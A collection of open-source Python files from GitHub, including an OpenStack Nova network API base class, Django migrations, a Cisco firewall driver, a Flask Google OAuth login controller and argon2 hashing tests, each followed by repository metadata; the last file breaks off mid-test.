affect_auto_assigned=False):
"""Removes (deallocates) a floating ip with address from a project."""
raise NotImplementedError()
def disassociate_and_release_floating_ip(self, context, instance,
floating_ip):
"""Removes (deallocates) and deletes the floating ip."""
raise NotImplementedError()
def associate_floating_ip(self, context, instance,
floating_address, fixed_address,
affect_auto_assigned=False):
"""Associates a floating ip with a fixed ip."""
raise NotImplementedError()
def disassociate_floating_ip(self, context, instance, address,
affect_auto_assigned=False):
"""Disassociates a floating ip from fixed ip it is associated with."""
raise NotImplementedError()
def allocate_for_instance(self, context, instance, vpn,
requested_networks, macs=None,
security_groups=None,
dhcp_options=None):
"""Allocates all network structures for an instance.
:param context: The request context.
:param instance: nova.objects.instance.Instance object.
:param vpn: A boolean, if True, indicate a vpn to access the instance.
:param requested_networks: A dictionary of requested_networks,
Optional value containing network_id, fixed_ip, and port_id.
:param macs: None or a set of MAC addresses that the instance
should use. macs is supplied by the hypervisor driver (contrast
with requested_networks which is user supplied).
:param security_groups: None or security groups to allocate for
instance.
:param dhcp_options: None or a set of key/value pairs that should
determine the DHCP BOOTP response, eg. for PXE booting an instance
configured with the baremetal hypervisor. It is expected that these
are already formatted for the neutron v2 api.
See nova/virt/driver.py:dhcp_options_for_instance for an example.
:returns: network info as from get_instance_nw_info() below
"""
raise NotImplementedError()
def deallocate_for_instance(self, context, instance,
requested_networks=None):
"""Deallocates all network structures related to instance."""
raise NotImplementedError()
def allocate_port_for_instance(self, context, instance, port_id,
network_id=None, requested_ip=None):
"""Allocate port for instance."""
raise NotImplementedError()
def deallocate_port_for_instance(self, context, instance, port_id):
"""Deallocate port for instance."""
raise NotImplementedError()
def list_ports(self, *args, **kwargs):
"""List ports."""
raise NotImplementedError()
def show_port(self, *args, **kwargs):
"""Show specific port."""
raise NotImplementedError()
def add_fixed_ip_to_instance(self, context, instance, network_id):
"""Adds a fixed ip to instance from specified network."""
raise NotImplementedError()
def remove_fixed_ip_from_instance(self, context, instance, address):
"""Removes a fixed ip from instance from specified network."""
raise NotImplementedError()
def add_network_to_project(self, context, project_id, network_uuid=None):
"""Force adds another network to a project."""
raise NotImplementedError()
def associate(self, context, network_uuid, host=SENTINEL,
project=SENTINEL):
"""Associate or disassociate host or project to network."""
raise NotImplementedError()
def get_instance_nw_info(self, context, instance, **kwargs):
"""Returns all network info related to an instance."""
raise NotImplementedError()
def create_pci_requests_for_sriov_ports(self, context,
pci_requests,
requested_networks):
"""Check requested networks for any SR-IOV port request.
Create a PCI request object for each SR-IOV port, and add it to the
pci_requests object that contains a list of PCI request object.
"""
raise NotImplementedError()
def validate_networks(self, context, requested_networks, num_instances):
"""validate the networks passed at the time of creating
the server.
Return the number of instances that can be successfully allocated
with the requested network configuration.
"""
raise NotImplementedError()
def get_instance_uuids_by_ip_filter(self, context, filters):
"""Returns a list of dicts in the form of
{'instance_uuid': uuid, 'ip': ip} that matched the ip_filter
"""
raise NotImplementedError()
def get_dns_domains(self, context):
"""Returns a list of available dns domains.
These can be used to create DNS entries for floating ips.
"""
raise NotImplementedError()
def add_dns_entry(self, context, address, name, dns_type, domain):
"""Create specified DNS entry for address."""
raise NotImplementedError()
def modify_dns_entry(self, context, name, address, domain):
"""Create specified DNS entry for address."""
raise NotImplementedError()
def delete_dns_entry(self, context, name, domain):
"""Delete the specified dns entry."""
raise NotImplementedError()
def delete_dns_domain(self, context, domain):
"""Delete the specified dns domain."""
raise NotImplementedError()
def get_dns_entries_by_address(self, context, address, domain):
"""Get entries for address and domain."""
raise NotImplementedError()
def get_dns_entries_by_name(self, context, name, domain):
"""Get entries for name and domain."""
raise NotImplementedError()
def create_private_dns_domain(self, context, domain, availability_zone):
"""Create a private DNS domain with nova availability zone."""
raise NotImplementedError()
def create_public_dns_domain(self, context, domain, project=None):
"""Create a public DNS domain with optional nova project."""
raise NotImplementedError()
def setup_networks_on_host(self, context, instance, host=None,
teardown=False):
"""Setup or teardown the network structures on hosts related to
instance.
"""
raise NotImplementedError()
def migrate_instance_start(self, context, instance, migration):
"""Start to migrate the network of an instance."""
raise NotImplementedError()
def migrate_instance_finish(self, context, instance, migration):
"""Finish migrating the network of an instance."""
raise NotImplementedError()
| {
"content_hash": "e8065a42233fa60b022b7463f0599232",
"timestamp": "",
"source": "github",
"line_count": 303,
"max_line_length": 79,
"avg_line_length": 38.772277227722775,
"alnum_prop": 0.6287027579162411,
"repo_name": "redhat-openstack/nova",
"id": "f43820bf5affa94f4496e062535e1aac0c5c1ab0",
"size": "12383",
"binary": false,
"copies": "4",
"ref": "refs/heads/f22-patches",
"path": "nova/network/base_api.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Groff",
"bytes": "112"
},
{
"name": "PLpgSQL",
"bytes": "2958"
},
{
"name": "Python",
"bytes": "15424955"
},
{
"name": "Shell",
"bytes": "20796"
},
{
"name": "Smarty",
"bytes": "678196"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import re
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Match',
fields=[
('match_id', models.BigIntegerField(primary_key=True, serialize=False)),
('match_seq_num', models.BigIntegerField(null=True)),
('radiant_win', models.BooleanField()),
('duration', models.IntegerField(null=True)),
('start_time', models.DateTimeField(null=True)),
('patch', models.CharField(max_length=255, null=True)),
('tower_status_radiant', models.IntegerField(null=True)),
('tower_status_dire', models.IntegerField(null=True)),
('barracks_status_radiant', models.IntegerField(null=True)),
('barracks_status_dire', models.IntegerField(null=True)),
('cluster', models.IntegerField(null=True)),
('first_blood_time', models.IntegerField(null=True)),
('lobby_type', models.CharField(max_length=255, null=True)),
('human_players', models.IntegerField(null=True)),
('leagueid', models.IntegerField(null=True)),
('game_mode', models.CharField(max_length=255, null=True)),
('flags', models.IntegerField(null=True)),
('engine', models.IntegerField(null=True)),
('radiant_score', models.IntegerField(null=True)),
('dire_score', models.IntegerField(null=True)),
],
),
migrations.CreateModel(
name='Slot',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('team', models.CharField(max_length=10)),
('account_id', models.BigIntegerField(null=True)),
('hero_id', models.IntegerField()),
('items', models.CharField(max_length=255, null=True, validators=[django.core.validators.RegexValidator(re.compile('^\\d+(?:\\,\\d+)*\\Z'), code='invalid', message='Enter only digits separated by commas.')])),
('kills', models.IntegerField(null=True)),
('deaths', models.IntegerField(null=True)),
('assists', models.IntegerField(null=True)),
('leaver_status', models.IntegerField(null=True)),
('last_hits', models.IntegerField(null=True)),
('denies', models.IntegerField(null=True)),
('gpm', models.IntegerField(null=True)),
('xpm', models.IntegerField(null=True)),
('level', models.IntegerField(null=True)),
('gold', models.IntegerField(null=True)),
('gold_spent', models.IntegerField(null=True)),
('hero_damage', models.IntegerField(null=True)),
('tower_damage', models.IntegerField(null=True)),
('hero_healing', models.IntegerField(null=True)),
('match', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='slots', to='app.Match')),
],
),
]
| {
"content_hash": "c6176dfe171d00b84c741d1bcf32ca9b",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 225,
"avg_line_length": 50.17910447761194,
"alnum_prop": 0.565437239738251,
"repo_name": "lucashanke/houseofdota",
"id": "aeab7e1683e2bc58f35c4d56aca0d947b6ee872f",
"size": "3434",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/migrations/0001_initial.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "6664"
},
{
"name": "Clojure",
"bytes": "4254"
},
{
"name": "HTML",
"bytes": "1914"
},
{
"name": "JavaScript",
"bytes": "69894"
},
{
"name": "Python",
"bytes": "120362"
}
],
"symlink_target": ""
} |
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='KubePod',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True,
serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('labels', models.CharField(max_length=255)),
('phase', models.CharField(max_length=20)),
('ip', models.CharField(max_length=15)),
],
),
]
| {
"content_hash": "cb215ece6b1377a65a7213095fdfeb6f",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 77,
"avg_line_length": 28.52173913043478,
"alnum_prop": 0.5076219512195121,
"repo_name": "mlbench/mlbench",
"id": "cb8c80931cf1d24e2b48e253f7344a6445809b1d",
"size": "705",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "mlbench/master/api/migrations/0001_initial.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "2829"
},
{
"name": "Dockerfile",
"bytes": "4848"
},
{
"name": "HTML",
"bytes": "26229"
},
{
"name": "JavaScript",
"bytes": "217157"
},
{
"name": "Makefile",
"bytes": "2646"
},
{
"name": "Python",
"bytes": "163751"
},
{
"name": "Ruby",
"bytes": "5299"
},
{
"name": "Shell",
"bytes": "10874"
},
{
"name": "Smarty",
"bytes": "1998"
}
],
"symlink_target": ""
} |
import time
from dfa.common import config
from dfa.common import dfa_logger as logging
from dfa.server.services.firewall.native import fabric_setup_base as FP
from dfa.server.services.firewall.native.drivers import base
import dfa.server.services.firewall.native.fw_constants as fw_const
from dfa.server.dfa_openstack_helper import DfaNeutronHelper as OsHelper
LOG = logging.getLogger(__name__)
class NativeFw(base.BaseDrvr, FP.FabricApi):
'''Native Firewall Driver'''
def __init__(self):
''' Class init '''
LOG.debug("Initializing Native Firewall")
super(NativeFw, self).__init__()
self.tenant_dict = {}
self.os_helper = OsHelper()
self.cfg = config.CiscoDFAConfig().cfg
self.mgmt_ip_addr = None
self.dcnm_obj = None
self.que_obj = None
def initialize(self, cfg_dict):
''' Initialization routine '''
LOG.debug("Initialize for NativeFw")
self.mgmt_ip_addr = cfg_dict.get('mgmt_ip_addr')
def pop_evnt_que(self, que_obj):
''' Populate the event queue object '''
LOG.debug("Pop Event for NativeFw")
self.que_obj = que_obj
def pop_dcnm_obj(self, dcnm_obj):
''' Populate the DCNM object '''
LOG.debug("Pop DCNM for NativeFw")
self.dcnm_obj = dcnm_obj
def is_device_virtual(self):
''' Returns if device is virtual '''
return True
def get_name(self):
''' Returns the name of the FW appliance '''
# Put it in a constant fixme(padkrish)
return 'native'
def get_max_quota(self):
# Return the right value fixme
'''
Returns the maximum number of FW instance that a single FW can
support
'''
return 50
def attach_intf_router(self, tenant_id, tenant_name, rtr_id):
''' Routine to attach the interface to the router '''
in_sub = self.get_in_subnet_id(tenant_id)
out_sub = self.get_out_subnet_id(tenant_id)
# Modify Hard coded Name fixme
subnet_lst = set()
subnet_lst.add(in_sub)
subnet_lst.add(out_sub)
ret = self.os_helper.add_intf_router(rtr_id, tenant_id, subnet_lst)
return ret, in_sub, out_sub
def get_rtr_id(self, tenant_id, tenant_name):
''' Retrieve the router ID '''
rout_id = None
if tenant_id in self.tenant_dict:
if 'rout_id' in self.tenant_dict.get(tenant_id):
rout_id = self.tenant_dict.get(tenant_id).get('rout_id')
if rout_id is None:
rtr_list = self.os_helper.get_rtr_by_name('FW_RTR_' + tenant_name)
if len(rtr_list) > 0:
rout_id = rtr_list[0].get('id')
return rout_id
def delete_intf_router(self, tenant_id, tenant_name, rout_id):
''' Routine to delete the router '''
in_sub = self.get_in_subnet_id(tenant_id)
out_sub = self.get_out_subnet_id(tenant_id)
subnet_lst = set()
subnet_lst.add(in_sub)
subnet_lst.add(out_sub)
rout_id = None
rout_id = self.get_rtr_id(tenant_id, tenant_name)
if rout_id is not None:
ret = self.os_helper.delete_intf_router(tenant_name, tenant_id,
rout_id, subnet_lst)
if not ret:
LOG.error("Failed to delete router intf id %(rout)s, tenant "
"%(tenant)s", {'rout': rout_id, 'tenant': tenant_id})
return ret
else:
LOG.error("Invalid router ID, can't delete interface from router")
return False
def prepare_rout_vm_msg(self, tenant_id, tenant_name, rout_id, net_id,
subnet_id, seg, status):
'''
Prepare the message to be sent to Event queue for VDP trigger.
This is actually called for a subnet add to a router. This function
prepares a VM's VNIC create/delete message
'''
flag = True
cnt = 0
while flag:
port_data = self.os_helper.get_router_port_subnet(subnet_id)
if port_data is None:
LOG.error("Unable to get router port data")
return None
if port_data.get('binding:host_id') == '':
time.sleep(3)
cnt = cnt + 1
if cnt > 3:
flag = False
else:
flag = False
if status is 'up':
event_type = 'service.vnic.create'
else:
event_type = 'service.vnic.delete'
vnic_data = {}
vnic_data['status'] = status
vnic_data['mac'] = port_data.get('mac_address')
vnic_data['segid'] = seg
vnic_data['host'] = port_data.get('binding:host_id')
if vnic_data['host'] == '':
LOG.error("Null host for seg %(seg)s subnet %(subnet)s",
{'seg': seg, 'subnet': subnet_id})
if self.tenant_dict.get(tenant_id).get('host') is None:
LOG.error("Null host for tenant %(tenant)s seg %(seg)s "
"subnet %(subnet)s",
{'tenant': tenant_id, 'seg': seg,
'subnet': subnet_id})
return None
else:
vnic_data['host'] = self.tenant_dict.get(tenant_id).get('host')
else:
self.tenant_dict[tenant_id]['host'] = vnic_data['host']
vnic_data['port_id'] = port_data.get('id')
vnic_data['network_id'] = net_id
vnic_data['vm_name'] = 'FW_SRVC_RTR_' + tenant_name
vnic_data['vm_ip'] = port_data.get('fixed_ips')[0].get('ip_address')
vnic_data['vm_uuid'] = rout_id
vnic_data['gw_mac'] = None
vnic_data['fwd_mod'] = 'anycast_gateway'
payload = {'service': vnic_data}
data = (event_type, payload)
return data
def send_rout_port_msg(self, tenant_id, tenant_name, rout_id, net_id,
subnet_id, seg, status):
''' Sends the router port message to the queue '''
data = self.prepare_rout_vm_msg(tenant_id, tenant_name, rout_id,
net_id, subnet_id, seg, status)
if data is None:
return False
timestamp = time.ctime()
# Remove hardcoding fixme (PRI_LOW_START)
pri = 30 + 4
LOG.info("Sending native FW data into queue %(data)s", {'data': data})
self.que_obj.put((pri, timestamp, data))
return True
def create_tenant_dict(self, tenant_id, rout_id=None):
''' Tenant dict creation '''
self.tenant_dict[tenant_id] = {}
self.tenant_dict[tenant_id]['host'] = None
self.tenant_dict[tenant_id]['rout_id'] = rout_id
def _create_fw(self, tenant_id, data):
''' Internal routine that gets called when a FW is created '''
LOG.debug("In creating Native FW data is %s", data)
tenant_name = data.get('tenant_name')
in_seg, in_vlan = self.get_in_seg_vlan(tenant_id)
out_seg, out_vlan = self.get_out_seg_vlan(tenant_id)
# self.get_mgmt_ip_addr(tenant_id)
# self.get_vlan_in_out(tenant_id)
# Check if router is already added and only then add, needed for
# restart cases since native doesn't have a special DB fixme
rout_id = data.get('router_id')
ret, in_sub, out_sub = self.attach_intf_router(tenant_id,
tenant_name, rout_id)
if not ret:
LOG.error("Native FW: Attach intf router failed for tenant %s",
tenant_id)
return False
self.create_tenant_dict(tenant_id, rout_id)
in_ip, in_start, in_end, in_gw, in_sec_gw = \
self.get_in_ip_addr(tenant_id)
out_ip, out_start, out_end, out_gw, out_sec_gw = \
self.get_out_ip_addr(tenant_id)
excl_list = []
excl_list.append(in_ip)
excl_list.append(out_ip)
# Program DCNM to update profile's static IP address on OUT part
ip_list = self.os_helper.get_subnet_nwk_excl(tenant_id, excl_list)
srvc_node_ip = self.get_out_srvc_node_ip_addr(tenant_id)
ret = self.dcnm_obj.update_partition_static_route(
tenant_name,
fw_const.SERV_PART_NAME, ip_list,
vrf_prof=self.cfg.firewall.fw_service_part_vrf_profile,
service_node_ip=srvc_node_ip)
if not ret:
LOG.error("Unable to update DCNM ext profile with static route %s",
rout_id)
ret = self.delete_intf_router(tenant_id, tenant_name, rout_id)
return False
# Program the default GW in router namespace
ret = False
cnt = 0
if out_gw != 0:
while not ret and cnt <= 3:
time.sleep(5)
ret = self.os_helper.program_rtr_default_gw(tenant_id, rout_id,
out_gw)
cnt = cnt + 1
if not ret:
LOG.error("Unable to program default GW in router %s", rout_id)
ret = self.delete_intf_router(tenant_id, tenant_name, rout_id)
return False
# Program router namespace to have all tenant networks to be routed
# to IN service network
ret = False
if in_gw != 0:
ret = self.os_helper.program_rtr_all_nwk_next_hop(
tenant_id, rout_id, in_gw, excl_list)
if not ret:
LOG.error("Unable to program default router next hop %s",
rout_id)
ret = self.delete_intf_router(tenant_id, tenant_name, rout_id)
return False
# Send message for router port auto config for in service nwk
in_net = self.get_in_net_id(tenant_id)
ret = self.send_rout_port_msg(tenant_id, tenant_name + '_in', rout_id,
in_net, in_sub, in_seg, 'up')
if not ret:
LOG.error("Sending rout port message failed for in network "
"tenant %(tenant)s subnet %(seg)s",
{'tenant': tenant_id, 'seg': in_seg})
ret = self.delete_intf_router(tenant_id, tenant_name, rout_id)
return False
# Send message for router port auto config for out service nwk
out_net = self.get_out_net_id(tenant_id)
ret = self.send_rout_port_msg(tenant_id, tenant_name + '_out', rout_id,
out_net, out_sub, out_seg, 'up')
if not ret:
LOG.error("Sending rout port message failed for out network "
"tenant %(tenant)s subnet %(seg)s",
{'tenant': tenant_id, 'seg': out_seg})
ret = self.send_rout_port_msg(tenant_id, tenant_name + '_in',
rout_id, in_net, in_sub, in_seg,
'down')
if not ret:
LOG.error("Error case, sending rout port message for in nwk"
" tenant %(tenant)s subnet %(seg)s",
{'tenant': tenant_id, 'seg': in_seg})
ret = self.delete_intf_router(tenant_id, tenant_name, rout_id)
return False
return True
def create_fw(self, tenant_id, data):
''' Top level routine called when a FW is created '''
try:
ret = self._create_fw(tenant_id, data)
return ret
except Exception as exc:
LOG.error("Failed to create FW for device native, tenant "
"%(tenant)s data %(data)s Exc %(exc)s",
{'tenant': tenant_id, 'data': data, 'exc': exc})
return False
# Create exceptions for all these fixme
def _delete_fw(self, tenant_id, data):
''' Internal routine called when a FW is deleted '''
LOG.debug("In Delete fw data is %s", data)
# Do the necessary stuffs in ASA
tenant_name = data.get('tenant_name')
in_seg, in_vlan = self.get_in_seg_vlan(tenant_id)
out_seg, out_vlan = self.get_out_seg_vlan(tenant_id)
in_net = self.get_in_net_id(tenant_id)
out_net = self.get_out_net_id(tenant_id)
in_sub = self.get_in_subnet_id(tenant_id)
out_sub = self.get_out_subnet_id(tenant_id)
rout_id = data.get('router_id')
if rout_id is None:
LOG.error("Router ID unknown for tenant %s", tenant_id)
return False
if tenant_id not in self.tenant_dict:
self.create_tenant_dict(tenant_id, rout_id)
ret = self.send_rout_port_msg(tenant_id, tenant_name + '_in', rout_id,
in_net, in_sub, in_seg, 'down')
if not ret:
LOG.error("Error case, sending rout port message for in nwk"
" tenant %(tenant)s subnet %(seg)s",
{'tenant': tenant_id, 'seg': in_seg})
ret = self.send_rout_port_msg(tenant_id, tenant_name + '_out', rout_id,
out_net, out_sub, out_seg, 'down')
if not ret:
LOG.error("Sending rout port message failed for out network "
"tenant %(tenant)s subnet %(seg)s",
{'tenant': tenant_id, 'seg': out_seg})
# Usually sending message to queue doesn't fail!!!
rout_ret = self.delete_intf_router(tenant_id, tenant_name, rout_id)
if not rout_ret:
LOG.error("Unable to delete router for tenant %s, error case",
tenant_id)
return rout_ret
del self.tenant_dict[tenant_id]
return rout_ret
def delete_fw(self, tenant_id, data):
''' Top level routine called when a FW is deleted '''
try:
ret = self._delete_fw(tenant_id, data)
return ret
except Exception as exc:
LOG.error("Failed to delete FW for device native, tenant "
"%(tenant)s data %(data)s Exc %(exc)s",
{'tenant': tenant_id, 'data': data, 'exc': exc})
return False
def modify_fw(self, tenant_id, data):
'''
Routine called when FW attributes gets modified. Nothing to be done
for native FW.
'''
LOG.debug("In Modify fw data is %s", data)
def _program_dcnm_static_route(self, tenant_id, tenant_name):
''' Program DCNM Static Route '''
in_ip, in_start, in_end, in_gw, in_sec_gw = \
self.get_in_ip_addr(tenant_id)
if in_gw is None:
LOG.error("No FW service GW present")
return False
out_ip, out_start, out_end, out_gw, out_sec_gw = \
self.get_out_ip_addr(tenant_id)
# Program DCNM to update profile's static IP address on OUT part
excl_list = []
excl_list.append(in_ip)
excl_list.append(out_ip)
subnet_lst = self.os_helper.get_subnet_nwk_excl(tenant_id, excl_list,
excl_part=True)
# This count is for telling DCNM to insert the static route in a
# particular position. Total networks created - exclusive list as
# above - the network that just got created.
srvc_node_ip = self.get_out_srvc_node_ip_addr(tenant_id)
ret = self.dcnm_obj.update_partition_static_route(
tenant_name, fw_const.SERV_PART_NAME, subnet_lst,
vrf_prof=self.cfg.firewall.fw_service_part_vrf_profile,
service_node_ip=srvc_node_ip)
if not ret:
LOG.error("Unable to update DCNM ext profile with static route")
return False
return True
def nwk_create_notif(self, tenant_id, tenant_name, cidr):
'''
Tenant Network create Notification
Restart is not supported currently for this.
'''
rout_id = self.get_rtr_id(tenant_id, tenant_name)
if rout_id is None:
LOG.error("Rout ID not present for tenant")
return False
ret = self._program_dcnm_static_route(tenant_id, tenant_name)
if not ret:
LOG.error("Program DCNM with static routes failed for rout %s",
rout_id)
return False
# Program router namespace to have this network to be routed
# to IN service network
in_ip, in_start, in_end, in_gw, in_sec_gw = \
self.get_in_ip_addr(tenant_id)
if in_gw is None:
LOG.error("No FW service GW present")
return False
ret = self.os_helper.program_rtr_nwk_next_hop(rout_id, in_gw, cidr)
if not ret:
LOG.error("Unable to program default router next hop %s",
rout_id)
return False
return True
def nwk_delete_notif(self, tenant_id, tenant_name, nwk_id):
'''
Tenant Network create Notification
Restart is not supported currently for this.
'''
rout_id = self.get_rtr_id(tenant_id, tenant_name)
if rout_id is None:
LOG.error("Rout ID not present for tenant")
return False
ret = self._program_dcnm_static_route(tenant_id, tenant_name)
if not ret:
LOG.error("Program DCNM with static routes failed for rout %s",
rout_id)
return False
# Program router namespace to have this network to be routed
# to IN service network
in_ip, in_start, in_end, in_gw, in_sec_gw = \
self.get_in_ip_addr(tenant_id)
if in_gw is None:
LOG.error("No FW service GW present")
return False
out_ip, out_start, out_end, out_gw, out_sec_gw = \
self.get_out_ip_addr(tenant_id)
excl_list = []
excl_list.append(in_ip)
excl_list.append(out_ip)
subnet_lst = self.os_helper.get_subnet_nwk_excl(tenant_id, excl_list,
excl_part=True)
ret = self.os_helper.remove_rtr_nwk_next_hop(rout_id, in_gw,
subnet_lst, excl_list)
if not ret:
LOG.error("Unable to program default router next hop %s",
rout_id)
return False
return True
| {
"content_hash": "b2c0634a66335321f50c167217888982",
"timestamp": "",
"source": "github",
"line_count": 438,
"max_line_length": 79,
"avg_line_length": 42.19634703196347,
"alnum_prop": 0.5421491180608159,
"repo_name": "CiscoSystems/fabric_enabler",
"id": "240663a170a8ab568b01b95b53d4e188657a9ba2",
"size": "19119",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dfa/server/services/firewall/native/drivers/native.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "920145"
},
{
"name": "Shell",
"bytes": "8220"
}
],
"symlink_target": ""
} |
from collections import OrderedDict
from typing import Dict, Type
from .base import LabelServiceTransport
from .grpc import LabelServiceGrpcTransport
# Compile a registry of transports.
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[LabelServiceTransport]]
_transport_registry["grpc"] = LabelServiceGrpcTransport
__all__ = (
"LabelServiceTransport",
"LabelServiceGrpcTransport",
)
| {
"content_hash": "b068b632cf119be5cd3845ceafa5e803",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 55,
"avg_line_length": 25.8125,
"alnum_prop": 0.7675544794188862,
"repo_name": "googleads/google-ads-python",
"id": "4d2b0c75098213d3776623ec45a9580462b67ea7",
"size": "1013",
"binary": false,
"copies": "3",
"ref": "refs/heads/main",
"path": "google/ads/googleads/v11/services/services/label_service/transports/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "23399881"
}
],
"symlink_target": ""
} |
import os
from flask import redirect, url_for, request, session
from flask_restplus import Namespace, Resource
from flask_dance.contrib.google import make_google_blueprint
from flask_dance.consumer import oauth_authorized
from flask_dance.consumer.storage.sqla import SQLAlchemyStorage
from flask_login import current_user, login_user
from backend.service import UserService
from backend.model import OAuth
from backend.dao.postgres_db import DBSession
from backend.util.response.error import ErrorResponse
from backend.util.safe_url import is_safe_url
from backend.controller import ErrorHandler
bplogin = make_google_blueprint(
login_url="google_login",
client_id=os.getenv("OAUTH_CLIENT_ID"),
client_secret=os.getenv("OAUTH_CLIENT_SECRET"),
scope=["https://www.googleapis.com/auth/userinfo.profile", "https://www.googleapis.com/auth/userinfo.email", "openid"],
offline=True,
redirect_url="",
storage=SQLAlchemyStorage(OAuth, DBSession(), user=current_user)
)
@oauth_authorized.connect_via(bplogin)
def user_logged_in(blueprint, token):
if not token:
return redirect(url_for("frontend.index", error="token"))
else:
response = blueprint.session.get("/oauth2/v1/userinfo")
if not response.ok:
return redirect(url_for("frontend.index", error="error"))
else:
try:
user_service = UserService()
user_info = response.json()
user_id = user_info["id"]
oauth = user_service.get_create_oauth(provider=blueprint.name, provider_user_id=user_id, token=token)
if not oauth.user:
email = user_info["email"]
name = user_info["name"]
picture = user_info["picture"]
user_service.get_create_user(oauth=oauth, email=email, name=name, picture=picture)
login_user(oauth.user)
return False
except Exception:
return redirect(url_for("frontend.index", error="error"))
loginNS = Namespace("User", description="User authentication with OAuth2.")
ERRORMODEL = ErrorResponse.get_model(loginNS, "ErrorResponse")
@loginNS.route("", strict_slashes=False)
class LoginAuthController(Resource):
@loginNS.response(302, "Redirect to login URL or index")
@loginNS.response(500, "Unexpected Error", ERRORMODEL)
def get(self):
"""User login"""
try:
if current_user.is_authenticated is False:
next_url = request.args.get("next")
if next_url is not None and is_safe_url(next_url):
session["next_url"] = next_url
return redirect(url_for("google.login"))
else:
return redirect(url_for("frontend.index"))
except Exception as error:
return ErrorHandler(error).handle_error()
| {
"content_hash": "416a26997fb4e8ac79163bdf246bf05e",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 123,
"avg_line_length": 36.88607594936709,
"alnum_prop": 0.648936170212766,
"repo_name": "willrp/willbuyer",
"id": "51d33f2cf30a4e13a15447a561249b8d30b84a4e",
"size": "2914",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "backend/controller/auth/login.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "8210"
},
{
"name": "Dockerfile",
"bytes": "1242"
},
{
"name": "HTML",
"bytes": "999"
},
{
"name": "JavaScript",
"bytes": "162138"
},
{
"name": "Python",
"bytes": "250597"
}
],
"symlink_target": ""
} |
__author__ = 'prossi'
class USER:
def __init__(self, obj, connection):
self.__dict__ = dict(obj.attrib)
self.connection = connection
| {
"content_hash": "8888500c9e29d4bca94cd44b7ff1ea75",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 40,
"avg_line_length": 19.5,
"alnum_prop": 0.5769230769230769,
"repo_name": "skyscape-cloud-services/skyscape_python",
"id": "52b8c80ba4549319f8f28c0e75544465cfdce08e",
"size": "156",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "skyscape/skyscape_user.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "56037"
}
],
"symlink_target": ""
} |
from base64 import b64encode
import pytest
from hypothesis import given
from hypothesis import strategies as st
from argon2 import Parameters, Type, extract_parameters
from argon2._utils import NoneType, _check_types, _decoded_str_len
from argon2.exceptions import InvalidHash
class TestCheckTypes:
def test_success(self):
"""
Returns None if all types are okay.
"""
assert None is _check_types(
bytes=(b"bytes", bytes),
tuple=((1, 2), tuple),
str_or_None=(None, (str, NoneType)),
)
def test_fail(self):
"""
Returns summary of failures.
"""
rv = _check_types(
bytes=("not bytes", bytes), str_or_None=(42, (str, NoneType))
)
assert "." == rv[-1] # proper grammar FTW
assert "'str_or_None' must be a str, or NoneType (got int)" in rv
assert "'bytes' must be a bytes (got str)" in rv
@given(st.binary())
def test_decoded_str_len(bs):
"""
_decoded_str_len computes the resulting length.
"""
assert len(bs) == _decoded_str_len(len(b64encode(bs).rstrip(b"=")))
VALID_HASH = (
"$argon2id$v=19$m=65536,t=2,p=4$"
"c29tZXNhbHQ$GpZ3sK/oH9p7VIiV56G/64Zo/8GaUw434IimaPqxwCo"
)
VALID_PARAMETERS = Parameters(
type=Type.ID,
salt_len=8,
hash_len=32,
version=19,
memory_cost=65536,
time_cost=2,
parallelism=4,
)
VALID_HASH_V18 = (
"$argon2i$m=8,t=1,p=1$c29tZXNhbHQ$gwQOXSNhxiOxPOA0+PY10P9QFO"
"4NAYysnqRt1GSQLE55m+2GYDt9FEjPMHhP2Cuf0nOEXXMocVrsJAtNSsKyfg"
)
VALID_PARAMETERS_V18 = Parameters(
type=Type.I,
salt_len=8,
hash_len=64,
version=18,
memory_cost=8,
time_cost=1,
parallelism=1,
)
class TestExtractParameters:
def test_valid_hash(self):
"""
A valid hash is parsed.
"""
parsed = extract_parameters(VALID_HASH)
assert VALID_PARAMETERS == parsed
def test_valid_hash_v18(self):
"""
A valid Argon v1.2 hash is parsed.
"""
parsed = extract_parameters(VALID_HASH_V18)
assert VALID_PARAMETERS_V18 == parsed
@pytest.mark.parametrize(
"hash",
[
"",
"abc" + VALID_HASH,
VALID_HASH.replace("p=4", "p=four"),
VALID_HASH.replace(",p=4", ""),
],
)
def test_invalid_hash(self, hash):
"""
Invalid hashes of various types raise an InvalidHash error.
"""
with pytest.raises(InvalidHash):
extract_parameters(hash)
class TestParameters:
def test_eq(self):
"""
Parameters are iff every attribute is equal.
"""
assert VALID_PARAMETERS == VALID_PARAMETERS
assert not VALID_PARAMETERS != VALID_PARAMETERS
def test_eq_wrong_type(self):
"""
Parameters are only compared if they have the same type.
"""
assert VALID_PARAMETERS != "foo"
assert not VALID_PARAMETERS == object()
def test_repr(self):
"""
__repr__ returns s ensible string.
"""
assert repr(
Parameters(
type=Type.ID,
